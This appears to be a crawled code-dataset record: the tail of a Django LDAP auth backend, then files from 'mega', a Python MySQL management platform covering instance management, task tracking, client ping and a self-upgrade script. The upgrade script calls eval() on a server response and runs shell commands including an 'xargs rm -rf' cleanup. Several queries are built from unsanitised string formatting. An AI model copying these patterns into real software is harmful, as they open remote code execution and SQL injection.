frozenset(mg)\n else:\n raise malformed_mirror_groups()\n\n if isinstance(mg, (set, frozenset)) and (\n not all(isinstance(value, str) for value in mg)\n ):\n raise malformed_mirror_groups()\n\n def _mirror_groups(self):\n \"\"\"\n Mirrors the user's LDAP groups in the Django database and updates the\n user's membership.\n \"\"\"\n target_group_names = frozenset(self._get_groups().get_group_names())\n current_group_names = frozenset(\n self._user.groups.values_list(\"name\", flat=True).iterator()\n )\n\n # These were normalized to sets above.\n MIRROR_GROUPS_EXCEPT = self.settings.MIRROR_GROUPS_EXCEPT\n MIRROR_GROUPS = self.settings.MIRROR_GROUPS\n\n # If the settings are white- or black-listing groups, we'll update\n # target_group_names such that we won't modify the membership of groups\n # beyond our purview.\n if isinstance(MIRROR_GROUPS_EXCEPT, (set, frozenset)):\n target_group_names = (target_group_names - MIRROR_GROUPS_EXCEPT) | (\n current_group_names & MIRROR_GROUPS_EXCEPT\n )\n elif isinstance(MIRROR_GROUPS, (set, frozenset)):\n target_group_names = (target_group_names & MIRROR_GROUPS) | (\n current_group_names - MIRROR_GROUPS\n )\n\n if target_group_names != current_group_names:\n existing_groups = list(\n Group.objects.filter(name__in=target_group_names).iterator()\n )\n existing_group_names = frozenset(group.name for group in existing_groups)\n\n new_groups = [\n Group.objects.get_or_create(name=name)[0]\n for name in target_group_names\n if name not in existing_group_names\n ]\n\n self._user.groups.set(existing_groups + new_groups)\n\n #\n # Group information\n #\n\n def _load_group_permissions(self):\n \"\"\"\n Populates self._group_permissions based on LDAP group membership and\n Django group permissions.\n \"\"\"\n group_names = self._get_groups().get_group_names()\n\n perms = Permission.objects.filter(group__name__in=group_names)\n perms = perms.values_list(\"content_type__app_label\", \"codename\")\n perms = perms.order_by()\n\n self._group_permissions = {\"{}.{}\".format(ct, name) for ct, name in perms}\n\n def _get_groups(self):\n \"\"\"\n Returns an _LDAPUserGroups object, which can determine group\n membership.\n \"\"\"\n if self._groups is None:\n self._groups = _LDAPUserGroups(self)\n\n return self._groups\n\n #\n # LDAP connection\n #\n\n def _bind(self):\n \"\"\"\n Binds to the LDAP server with AUTH_LDAP_BIND_DN and\n AUTH_LDAP_BIND_PASSWORD.\n \"\"\"\n self._bind_as(self.settings.BIND_DN, self.settings.BIND_PASSWORD, sticky=True)\n\n def _bind_as(self, bind_dn, bind_password, sticky=False):\n \"\"\"\n Binds to the LDAP server with the given credentials. This does not trap\n exceptions.\n\n If sticky is True, then we will consider the connection to be bound for\n the life of this object. If False, then the caller only wishes to test\n the credentials, after which the connection will be considered unbound.\n \"\"\"\n logger.debug(\"Binding as %s\", bind_dn)\n self._get_connection().simple_bind_s(bind_dn, bind_password)\n\n self._connection_bound = sticky\n\n def _get_connection(self):\n \"\"\"\n Returns our cached LDAPObject, which may or may not be bound.\n \"\"\"\n if self._connection is None:\n uri = self.settings.SERVER_URI\n if callable(uri):\n uri = uri(self._request)\n\n self._connection = self.backend.ldap.initialize(uri, bytes_mode=False)\n\n for opt, value in self.settings.CONNECTION_OPTIONS.items():\n self._connection.set_option(opt, value)\n\n if self.settings.START_TLS:\n logger.debug(\"Initiating TLS\")\n self._connection.start_tls_s()\n\n return self._connection\n\n\nclass _LDAPUserGroups:\n \"\"\"\n Represents the set of groups that a user belongs to.\n \"\"\"\n\n def __init__(self, ldap_user):\n self.settings = ldap_user.settings\n self._ldap_user = ldap_user\n self._group_type = None\n self._group_search = None\n self._group_infos = None\n self._group_dns = None\n self._group_names = None\n\n self._init_group_settings()\n\n def _init_group_settings(self):\n \"\"\"\n Loads the settings we need to deal with groups.\n\n Raises ImproperlyConfigured if anything's not right.\n\n \"\"\"\n self._group_type = self.settings.GROUP_TYPE\n if self._group_type is None:\n raise ImproperlyConfigured(\n \"AUTH_LDAP_GROUP_TYPE must be an LDAPGroupType instance.\"\n )\n\n self._group_search = self.settings.GROUP_SEARCH\n if self._group_search is None:\n raise ImproperlyConfigured(\n \"AUTH_LDAP_GROUP_SEARCH must be an LDAPSearch instance.\"\n )\n\n def get_group_names(self):\n \"\"\"\n Returns the set of Django group names that this user belongs to by\n virtue of LDAP group memberships.\n \"\"\"\n if self._group_names is None:\n self._load_cached_attr(\"_group_names\")\n\n if self._group_names is None:\n group_infos = self._get_group_infos()\n self._group_names = {\n self._group_type.group_name_from_info(group_info)\n for group_info in group_infos\n }\n self._cache_attr(\"_group_names\")\n\n return self._group_names\n\n def is_member_of(self, group_dn):\n \"\"\"\n Returns true if our user is a member of the given group.\n \"\"\"\n is_member = None\n\n # Normalize the DN\n group_dn = group_dn.lower()\n\n # If we have self._group_dns, we'll use it. Otherwise, we'll try to\n # avoid the cost of loading it.\n if self._group_dns is None:\n is_member = self._group_type.is_member(self._ldap_user, group_dn)\n\n if is_member is None:\n is_member = group_dn in self.get_group_dns()\n\n membership = \"\" if is_member else \" not\"\n logger.debug(f\"%s is{membership} a member of %s\", self._ldap_user.dn, group_dn)\n\n return is_member\n\n def get_group_dns(self):\n \"\"\"\n Returns a (cached) set of the distinguished names in self._group_infos.\n \"\"\"\n if self._group_dns is None:\n group_infos = self._get_group_infos()\n self._group_dns = {group_info[0] for group_info in group_infos}\n\n return self._group_dns\n\n def _get_group_infos(self):\n \"\"\"\n Returns a (cached) list of group_info structures for the groups that our\n user is a member of.\n \"\"\"\n if self._group_infos is None:\n self._group_infos = self._group_type.user_groups(\n self._ldap_user, self._group_search\n )\n\n return self._group_infos\n\n def _load_cached_attr(self, attr_name):\n if self.settings.CACHE_TIMEOUT > 0:\n key = self._cache_key(attr_name)\n value = cache.get(key)\n setattr(self, attr_name, value)\n\n def _cache_attr(self, attr_name):\n if self.settings.CACHE_TIMEOUT > 0:\n key = self._cache_key(attr_name)\n value = getattr(self, attr_name, None)\n cache.set(key, value, self.settings.CACHE_TIMEOUT)\n\n def _cache_key(self, attr_name):\n \"\"\"\n Memcache keys can't have spaces in them, so we'll remove them from the\n DN for maximum compatibility.\n \"\"\"\n dn = self._ldap_user.dn\n return valid_cache_key(\n \"auth_ldap.{}.{}.{}\".format(type(self).__name__, attr_name, dn)\n )\n\n\ndef valid_cache_key(key):\n \"\"\"\n Sanitizes a cache key for memcached.\n \"\"\"\n return re.sub(r\"\\s+\", \"+\", key)[:250]\n" } ]
22
Captian5ye/mega
https://github.com/Captian5ye/mega
dea669f67ac4da5a4b4d1f9fc21f8233ff7a795c
09a2753b2bc06258ebbb782d1e2ff2db606bfe6f
cadd032022add5dad63de22faa0a87e63522e2f5
refs/heads/master
2021-01-18T07:53:23.005551
2014-10-23T08:16:33
2014-10-23T08:16:33
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4653141498565674, "alphanum_fraction": 0.5412303805351257, "avg_line_length": 36.29268264770508, "blob_id": "ad2dac3c5eb53fa1c1d391e9b48d85136e5bf54f", "content_id": "182b3d00f600028db4d42a05a6342f24e2270038", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1528, "license_type": "no_license", "max_line_length": 207, "num_lines": 41, "path": "/src/tests/sync_base.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Oct 21, 2014\n\n@author: xchliu\n\n@module:tests.sync_base\n'''\nfrom mega_client import sender\n\ndata_stat={'172.17.62.56:3306':\n {\n 'status': {'com_drop_function': '123', 'performance_schema_socket_instances_lost': '0'},\n 'timestamp':'2014-10-21 10:52:23',\n 'except':{},\n 'slave_status':{}\n }\n }\ndata_base={'172.17.62.56:3306':\n {\n 'timestamp':'2014-10-21 10:52:23',\n 'variables':{'report_port': '3308', 'ignore_builtin_innodb': 'OFF', 'innodb_large_prefix': 'OFF', 'innodb_online_alter_log_max_size': '134217728'},\n 'except':{'test':'test except'}, \n 'mysql_user':{'test@test1':'test','[email protected]': \"aaaGRANT SELECT, INSERT, LOCK TABLES ON `dbchecksum`.* TO 'dbchecksum'@'172.17.62.45'\",}, \n 'db_name':['dbchecksum', 'dbchecksum_bak', 'mega', 'report'], \n 'base':{'cnf': '/export/servers/data/my3308/my.cnf', 'version': '5.6.16'},\n 'table_status':[{'engine': 'InnoDB', 'table_rows': '0', 'index_length': '16384', 'data_length': '16384', 'db_name': 'mega_local', 'table_name': '_dba_worksheet', 'table_comment': ''}] \n } \n }\ncmd='data_collect_save'\nc=sender.MegaClient(cmd=cmd)\n#r=c.run(func_args=data_stat)\n#print \"test data stat:%s\" % r\nr=c.run(func_args=data_base)\nc.close() \nprint \"test data base:%s\" % r\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6177062392234802, "alphanum_fraction": 0.635814905166626, "avg_line_length": 17.44444465637207, "blob_id": "51c5399d461b78592e3cd2d593655f12cfee1511", "content_id": "c40f91668cd8ffc98496168743b0e85ea66843c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "no_license", "max_line_length": 65, "num_lines": 27, "path": "/src/mega_web/monitor/alert_manage.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Sep 25, 2014\n\n@author: xchliu\n\n@module:monitor.alter_manage\n'''\n\nfrom lib.PyMysql import PyMySQL\n\ncursor=PyMySQL()\n\ndef get_alert_list():\n sql=\"select * from alert where stat=0 order by model,target;\"\n return cursor.query(sql,type='dict').fetchall()\n\ndef update_alert(id):\n if not id :\n return False\n sql=\"update alert set stat=1 where id=%s\" % id\n return cursor.execute(sql)\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.4868420958518982, "alphanum_fraction": 0.530701756477356, "avg_line_length": 25.882352828979492, "blob_id": "4c2d42ecdeea97200ae97d579ce4e153a310fd91", "content_id": "622cd1165772ed7f89daaf8136a1b909e2a9f2aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 456, "license_type": "no_license", "max_line_length": 119, "num_lines": 17, "path": "/src/mega_web/monitor/baseinfo.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Oct 14, 2014\n\n@author: xchliu\n\n@module:mega_web.monitor.baseinfo\n'''\n\na=['172.17.62.37:3306', {'status': None, 'timestamp': None, 'variables': None, 'db_name': None, 'connectible': 'True', \n 'slow_log': None, 'except': [], 'table_status': None, 'error_log': None, 'mysql_user': None, \n 'slave_status': None}]\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5965583324432373, "alphanum_fraction": 0.6271510720252991, "avg_line_length": 12.100000381469727, "blob_id": "c783edabfe8d711498946545c24e3eb7f56b36a2", "content_id": "c29be940e4d8252d7574e6632bba2ab7e49c659d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 651, "license_type": "no_license", "max_line_length": 35, "num_lines": 40, "path": "/docs/project.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#Mega\n#Database management platform \n\n* Resource manage\n* Monitor\n* Deployment\n* APIs\n\n##开发语言\n\n\n1. Python 2.7.5\n2. html\n3. js\n4. shell\n\n\n\n##Packages\n\n1. web 前端框架(js,css,jquey):bootstap \n2. web后端框架:django 1.4.2\n3. 绘图框架:chartit\n4. 数据库连接:MySQLdb,django.model\n5. 后台数据库: MySQL\n6. \n\n##Documents\n\n###[项目需求文档](./prd.md)\n###[开发规范](./develop.md)\n###[进度跟踪](./tasklist.md)\n###[API文档](./api.md)\n###[BUG列表](./bugs.md)\n###[Release]()\n\n##功能模块\n### [wydba客户端](./wydba.md) \n### [slow log分析统计](./slow_log.md) \n### [server服务层设计](./framework.md)" }, { "alpha_fraction": 0.601190447807312, "alphanum_fraction": 0.6057692170143127, "avg_line_length": 25.64634132385254, "blob_id": "d8e785ff851ad1fe0f53972af5474387fd157860", "content_id": "8ac61d592251f5d691d061c1e0bbc4a5cd189a97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2184, "license_type": "no_license", "max_line_length": 105, "num_lines": 82, "path": "/src/apis/tools.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 30, 2014\n\n@author: xchliu\n\n@module:apis.tools\n'''\nimport os\nimport sys\n\nimport release\nfrom lib.logs import Logger\nfrom lib.PyMysql import PyMySQL\nfrom conf.settings import SERVICE_NAME\nfrom mega_web.resource.server_manage import ServerGet\n\nMODEL='API-tool'\nlog = Logger(MODEL).log()\n\n\ndef client_upgrade(host_list=None):\n \n '''\n client upgrade for the given host list\n '''\n _pag=[]\n log.info('Receive upgrade request: %s ' % host_list)\n pag_name=SERVICE_NAME+\"-\"+release.version\n app_path=os.path.dirname(sys.path[0])\n \n _prefix=os.path.join(app_path,'mega_client',pag_name)\n #pag_path=os.path.join(_prefix,'mega_client')\n try:\n _pag.append(pag_name)\n _pag.extend(_read_file(_prefix,_prefix))\n return _pag\n# log.debug(f)\n except Exception as ex:\n log.error(ex)\n return ''\n\ndef _read_file(path,prefix=''):\n '''\n return a list contains all the file content in the given path \n '''\n if not os.path.isdir(path):\n return []\n data=[]\n for root,dirs,files in os.walk(path):\n for file in files:\n file=os.path.join(root,file) \n _f=open(file,'rb').read()\n _p=file.replace(prefix,'')\n data.append({_p:_f})\n return data\n\ndef client_ping(ip,version=None,**args):\n log.info('Client ping from %s' % ip)\n server_id=ServerGet().get_server_by_ip(ip)\n if not server_id:\n log.error(\"Get server id failed for %s\" % ip)\n return \"unregistered server\"\n server_id=server_id[0]['id']\n sql=\"select count(*) from client where server_id=%s\" % server_id\n _counts=PyMySQL().fetchOne(sql)\n if _counts == 0:\n sql=\"insert into client(server_id,version,heartbeat) values(%s,'%s',now())\" % (server_id,version)\n else:\n sql=\"update client set heartbeat=now(),version='%s' where server_id=%s \" %(version,server_id)\n result,ex=PyMySQL().execute(sql)\n if not result:\n log.error(\"Client keepalived check failed: %s %s\" %(ip,ex))\n return ''\n return result\n \ndef main():\n print client_upgrade()\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5297029614448547, "alphanum_fraction": 0.5361766815185547, "avg_line_length": 29.195402145385742, "blob_id": "48b95be4226f907cc1db6d15e94ac2e1e19f75b0", "content_id": "294c4503b8d213c9a042347f8e33fccc72286f10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2626, "license_type": "no_license", "max_line_length": 85, "num_lines": 87, "path": "/src/mega_client/mega_client/script/upgrade.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 30, 2014\n\n@author: xchliu\n\n@module:mega_service.mega_client.upgrade\n'''\nimport os\nimport commands\nfrom mega_client.logs import Logger\nfrom mega_client.sender import MegaClient\nfrom mega_client.utils import get_ip_address\nfrom mega_client.setting import CLIENT_DIR,MEGA_HOST\n\nMODEL='Upgrade'\nlog = Logger(MODEL).log()\n\nclass Upgrade():\n \n def __init__(self):\n self.mega_server=MEGA_HOST\n self.cmd='client_upgrade' \n self.c=MegaClient(host=self.mega_server,cmd=self.cmd)\n self.setup_path=''\n \n def _get_pag(self):\n log.info('Start mega client upgrade')\n domain,ip=get_ip_address()\n ip=\"['\"+ip+\"']\" \n pag=self.c.run(func_args=ip,TOOL=True)\n if pag==0:\n log.error('Failed to connect to mega server:%s' % self.mega_server)\n return False\n pag=eval(pag)\n tmp_dir=os.path.join('/tmp',pag.pop(0))\n self.setup_path=tmp_dir\n if not os.path.isdir(tmp_dir):\n os.mkdir(tmp_dir)\n for p in pag:\n #/mega_client/__init__.py\n file_name=p.items()[0][0].lstrip('/')\n file_content=p.items()[0][1]\n file_path=os.path.join(tmp_dir,'/'.join(file_name.split('/')[:-1]))\n if not os.path.isdir(file_path):\n os.makedirs(file_path)\n f=open(os.path.join(tmp_dir,file_name),'wb+')\n f.write(file_content)\n f.close()\n return True\n \n def run(self):\n if not self._get_pag():\n return False\n #install package\n os.chdir(self.setup_path)\n cmd=(\n ['Remove old package','cat %s/record.info| xargs rm -rf' % CLIENT_DIR ],\n ['Update package','python %s/setup.py install' %self.setup_path],\n ['Replace client source','cp -r %s %s' % (self.setup_path,CLIENT_DIR)],\n ['Change file mod','chmod a+x /etc/init.d/mega_client'],\n ['Stop mega client','python /etc/init.d/mega_client upgrade']\n )\n for c in cmd:\n result=self._do_command(c[1],c[0])\n if not result:\n log.error('Abort upgrade!')\n break\n\n def _do_command(self,cmd,action):\n _status,_output=commands.getstatusoutput(cmd)\n if _status <> 0:\n log.error('%s failed : %s' % (action,_output))\n return False\n else:\n log.info('%s success:%s' % (action,_output))\n return True\n\n\n \n \n \ndef main():\n Upgrade().run()\n \nif __name__ == \"__main__\": \n main()" }, { "alpha_fraction": 0.48902076482772827, "alphanum_fraction": 0.49732938408851624, "avg_line_length": 28.928571701049805, "blob_id": "e1bb3f27c17b7d70eeb2086718065e43d62f02bb", "content_id": "9547b49957d29aaf9ae0106e18630665b22a5e4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1685, "license_type": "no_license", "max_line_length": 117, "num_lines": 56, "path": "/src/mega_service/tracker.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import time\nfrom lib.logs import Logger\nfrom lib.PyMysql import PyMySQL\nfrom mega_service.task import Task\nfrom conf.settings import TRACKER_LIFCYCLE\n\nMODEL='Tracker'\nlog=Logger(MODEL).log()\n\nclass Tracker():\n def __init__(self,queue):\n '''\n Two type tasks would be tracked :\n 1.cycle task on the specified time\n 2.realtime task need to be retry\n '''\n self.queue=queue \n self.q=PyMySQL()\n \n def tracker(self):\n data=None\n while 1:\n try:\n data=self.routine_task()\n for d in data:\n self.queue.put(d)\n time.sleep(TRACKER_LIFCYCLE)\n except Exception as ex:\n log.error(ex)\n \n def routine_task(self):\n _task=[]\n _t={}\n now=time.strftime('%H:%M',time.localtime(time.time()))\n sql=\"select * from task where timestampdiff(second,last_time,now())>=cycle and stat=1;\"\n for t in self.q.fetchAll(sql):\n _t={}\n _t[\"ARGS\"]=\"'\"+str(now)+\"'\" \n _t[\"NAME\"]=t[1]\n _t[\"TYPE\"]=t[2]\n _t[\"VALUE\"]=t[3]\n _t[\"LAST_TIME\"]=t[4]\n _t[\"CYCLE\"]=t[5]\n _t[\"TARGET\"]=t[6]\n _t[\"SCRIPT\"]=t[9]\n _t[\"TIME\"]=0 #realtime jobs\n _t[\"TASK_ID\"]=t[0] # used to log the task status when mega client run over the task and return the output\n _task.append(_t)\n #update the last_time of task up to now\n Task().stat_task_by_id(t[0])\n if _task:\n log.debug(_task)\n return _task\n \n def retry_task(self):\n return \n " }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.5178571343421936, "avg_line_length": 8.600000381469727, "blob_id": "f393c88d6638905347757a77800089d5f5320c1b", "content_id": "958fc4470de81ec03bdc8f28003e4de0324ca378", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56, "license_type": "no_license", "max_line_length": 22, "num_lines": 5, "path": "/src/mega_web/lib/__init__.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 1, 2014\n\n@author: xchliu\n'''\n " }, { "alpha_fraction": 0.5344827771186829, "alphanum_fraction": 0.5747126340866089, "avg_line_length": 12.461538314819336, "blob_id": "0714c0afdfb61707cdca00bfd60edb8de8ed7e28", "content_id": "2dc7eaf723de1548ea97a6ebb9a09dd50a351d21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "no_license", "max_line_length": 39, "num_lines": 13, "path": "/src/mega_service/resource/sync_stat.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Oct 17, 2014\n\n@author: xchliu\n\n@module:mega_service.resource.sync_stat\n'''\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5818981528282166, "alphanum_fraction": 0.5850408673286438, "avg_line_length": 36.32863998413086, "blob_id": "b167cf0f7725aba440814ec06e4e46cfc359e8dc", "content_id": "d96c7afa9db4728173fe9c0ce481fa1053e8b103", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7955, "license_type": "no_license", "max_line_length": 151, "num_lines": 213, "path": "/src/mega_web/resource/instance_manage.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import datetime\nfrom conf.GlobalConf import *\nfrom lib.PyMysql import PyMySQL\nfrom lib.utils import check_ip,is_int\nfrom server_manage import ServerGet,ServerManage\nfrom mega_web.entity.models import Instance,Business,User\nfrom mega_service.resource.get_value import get_instance_newest_variable,get_instance_newest_stat\n\nMSG_ERR_INSTANCE_NOT_EXITST='instance does not exists!'\n\nclass InstanceManage():\n def __init__(self,instance):\n '''\n instance : a dict with instance base info\n '''\n self.inst_id=instance.get(\"instance_id\") \n self.inst_ip=instance.get(\"instance_ip\")\n self.inst_port=instance.get(\"instance_port\")\n self.inst_level=instance.get(\"instance_level\")\n self.inst_name=instance.get(\"instance_name\")\n self.inst_owner=instance.get(\"instance_owner\")\n self.inst_business=instance.get(\"instance_business\")\n self.inst_online_date=instance.get(\"instance_online\")\n self.inst_dbtype=instance.get(\"instance_db_type\")\n self.inst_hatype=instance.get(\"instance_ha_type\")\n self.inst_version=instance.get(\"instance_version\")\n self.inst_role=instance.get('instance_role')\n self.inst_master=instance.get('instance_master')\n self.msg=''\n \n def data_check(self):\n if not self.inst_ip or not check_ip(self.inst_ip):\n self.msg+=MSG_ERR_IP\n return False\n if is_int(self.inst_port):\n self.msg+=MSG_ERR_PORT\n return False\n if not self.inst_level:\n self.inst_level=DEFAULT_LEVEL\n if not self.inst_name:\n self.inst_name=self.inst_ip\n if not self.inst_owner:\n self.inst_owner=DEFAULT_OWNER\n if not self.inst_online_date:\n self.inst_online_date=datetime.datetime.now()\n if not self.inst_dbtype:\n self.inst_dbtype=DEFAULT_DBTYPE\n if not self.inst_hatype:\n self.inst_hatype=DEFAULT_HATYPE\n if not self.inst_business:\n self.inst_business=DEFAULT_BUSINESS\n \n return True\n \n def add_instance(self):\n '''\n save new instance\n \n '''\n server_id=1\n if not self.data_check():\n return False,self.msg\n is_exist=InstanceGet().get_instance_by_ip_port(self.inst_ip, self.inst_port)\n if is_exist:\n self.msg+=MSG_ERR_INSTANCE_EXITST\n return False,self.msg\n \n is_server_exist=ServerGet().get_server_by_ip(self.inst_ip)\n if not is_server_exist:\n s,msg=ServerManage({'server_ip':self.inst_ip}).add_server() \n\n server=ServerGet().get_server_by_ip(self.inst_ip)[0] \n if server:\n server_id=server[\"id\"]\n #is_owner_exist=\n #is_business_exist= \n inst=Instance(server_id=server_id,ip=self.inst_ip,port=self.inst_port,level=self.inst_level,name=self.inst_name,business_id=self.inst_business,\n online_date=self.inst_online_date,owner=self.inst_owner,db_type=self.inst_dbtype,ha_type=self.inst_hatype)\n\n if self.inst_role==2 or self.inst_role == '2':\n inst.master_id=self.inst_master\n inst.save()\n return True,self.msg\n \n def mod_instance(self):\n if not self.inst_id:\n self.inst_id=InstanceGet().get_instance_by_ip_port(self.inst_ip, self.inst_port)\n if not self.inst_id:\n return False,MSG_ERR_INSTANCE_NOT_EXITST\n inst=Instance.objects.get(id=self.inst_id) \n #inst.ip=self.inst_ip\n #inst.port=self.inst_port\n if self.inst_business:\n inst.business_id=self.inst_business\n if self.inst_level: \n inst.level=self.inst_level\n if self.inst_name: \n inst.name=self.inst_name \n if self.inst_dbtype: \n inst.db_type=self.inst_dbtype\n if self.inst_hatype:\n inst.ha_type=self.inst_hatype\n if self.inst_online_date:\n inst.online_date=self.inst_online_date\n if self.inst_owner:\n inst.owner=self.inst_owner\n if self.inst_version:\n inst.version=self.inst_version\n if self.inst_role:\n inst.role=self.inst_role\n if self.inst_role==2 or self.inst_role == '2':\n if self.inst_master:\n inst.master_id=self.inst_master\n else:\n inst.master_id=0\n inst.save()\n return True,self.msg\n \n def stat_instance(self,action=False):\n if not self.inst_id:\n return False,MSG_ERR_INSTANCE_NOT_EXITST\n inst=Instance.objects.get(id=self.inst_id)\n if action:\n inst.stat=STAT_OFFLINE\n else:\n if inst.stat==STAT_ONLINE:\n inst.stat=STAT_OFFLINE\n else:\n inst.stat=STAT_ONLINE\n inst.save()\n return True,self.msg\n def stat_instance_slowlog(self):\n if not self.inst_id:\n return False,MSG_ERR_INSTANCE_NOT_EXITST\n inst=Instance.objects.get(id=self.inst_id)\n if inst.slowlog == 1:\n inst.slowlog =0\n else:\n inst.slowlog=1\n inst.save()\n return True,self.msg\n \nclass InstanceGet():\n '''\n all the instance info query\n '''\n def __init__(self):\n self.inst=Instance\n self.q=PyMySQL()\n \n def get_instance(self,instance):\n inst_id=instance.get(\"instance_id\")\n result=self.get_instance_by_id(inst_id)\n business=Business.objects.filter(id=result['business_id']).values('name')[0]\n owner=User.objects.filter(id=result['owner']).values('name')[0]\n if result['master_id']:\n master=self.get_instance_by_id(result['master_id'])\n if master:\n result['master_ip']=master['ip']\n result['master_port']=master['port'] \n result[\"business\"]=business['name']\n result[\"owner_name\"]=owner['name']\n return result\n \n def get_instance_base(self,instance_id):\n '''\n get the basic info beyond the columns of instance\n uptime\n socket\n '''\n uptime=get_instance_newest_stat(instance_id,'uptime')\n uptime=str(datetime.timedelta(seconds=uptime))\n socket=get_instance_newest_variable(instance_id,'socket') \n return {'uptime':uptime,'socket':socket}\n \n def get_instance_by_id(self,inst_id=0):\n if inst_id:\n result=self.inst.objects.filter(id=inst_id).values()[0]\n else:\n result=self.inst.objects.all()[0:1].values()[0]\n return result\n \n def get_instance_by_ip(self,inst_ip=''):\n if not inst_ip:\n return\n result=self.inst.objects.filter(ip=inst_ip).values()\n return result\n def get_instance_by_ip_port(self,ip,port=DEFAULT_DB_PORT):\n result=0\n result=self.inst.objects.filter(ip=ip,port=port).values(\"id\")\n return result\n def get_instance_list(self,str_filter,count=10,offset=0):\n result=None\n if not str_filter:\n str_filter=''\n sql=\"select i.* ,i.business_id,b.name as business,i.owner as owner_id,u.name as owner from instance i \\\n left join business b on i.business_id=b.id left join user u on i.owner=u.id where 1=1 \"\n if len(str_filter):\n for f in str_filter:\n if len(str(str_filter[f])) <>0:\n sql+=\" and %s='%s'\" % (f,str_filter[f])\n sql+=\" order by i.stat desc,i.ip,i.port \"\n if count==0:\n result=self.inst.objects.raw(sql)\n else:\n result=self.inst.objects.raw(sql)[offset:count]\n return result \n \n def get_instance_slaves(self,instance_id):\n if not instance_id:\n return None \n result=self.inst.objects.filter(master_id=instance_id).values()\n return result\n " }, { "alpha_fraction": 0.6148648858070374, "alphanum_fraction": 0.625, "avg_line_length": 19.413793563842773, "blob_id": "f4fa036dcc1e7cfd95a3bcc6382444950780359a", "content_id": "fb25306e8c83bba015300a208bfebd8799177137", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 592, "license_type": "no_license", "max_line_length": 73, "num_lines": 29, "path": "/src/mega_client/mega-1.0/mega_client/ping.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 6, 2014\n\n@author: xchliu\n\n@module:mega_client.mega_client.script.ping\n'''\n\nfrom sender import MegaClient\nfrom utils import get_ip_address\nfrom setting import version,MEGA_HOST\n\ndef main():\n '''\n keepalived check between mega service and client\n ''' \n myname,myip=get_ip_address()\n \n cmd='client_ping'\n c=MegaClient(host=MEGA_HOST,cmd=cmd)\n result=c.run(func_args=\"'%s',version='%s'\" %(myip,version),TOOL=True)\n if result:\n return 'success'\n else:\n return 'failed'\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5724999904632568, "alphanum_fraction": 0.5975000262260437, "avg_line_length": 16.434782028198242, "blob_id": "47131047d44c57217b5f3d035ea939c2a10222d4", "content_id": "d08a0e1ab5faa5b3c227c4549150acb7fe09acac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 400, "license_type": "no_license", "max_line_length": 54, "num_lines": 23, "path": "/src/apis/report.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Sep 24, 2014\n\n@author: xchliu\n\n@module:apis.report\n'''\n\nimport datetime\nfrom mega_service.report import daily \n\ndef report_routine(time=None):\n #daily\n if not time:\n time=datetime.datetime.now().strftime('%H:%M')\n if int(time.split(':')[0]) == 10 :\n daily.backup_report_daily()\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.4872744083404541, "alphanum_fraction": 0.5224432945251465, "avg_line_length": 27.559999465942383, "blob_id": "82efdc34d75404c4a6d8d802811a2760cc9e571a", "content_id": "f3dbda5db34424fdd513db6bc781de31b7d8e71b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2201, "license_type": "no_license", "max_line_length": 91, "num_lines": 75, "path": "/src/scripts/mega_salt.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# coding: utf-8\n#Created on 2014-06-12\n#@author: gxg\n#Usage:mega_salt use for doing db backup by mega calling \n\nimport sys\nsys.path.append('/export/servers/script/mega-master/src/mega_service/')\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nimport salt.client\nimport json, traceback\nimport time\nimport os\nimport commands\nimport ast\nimport getpass\n\ndef saltcmdrun(ip,command,args):\n '''\n command 是命令脚本,调用远程服务器脚本(带绝对路径)\n '''\n #ip = ['172.17.62.43','172.17.62.42']\n client = 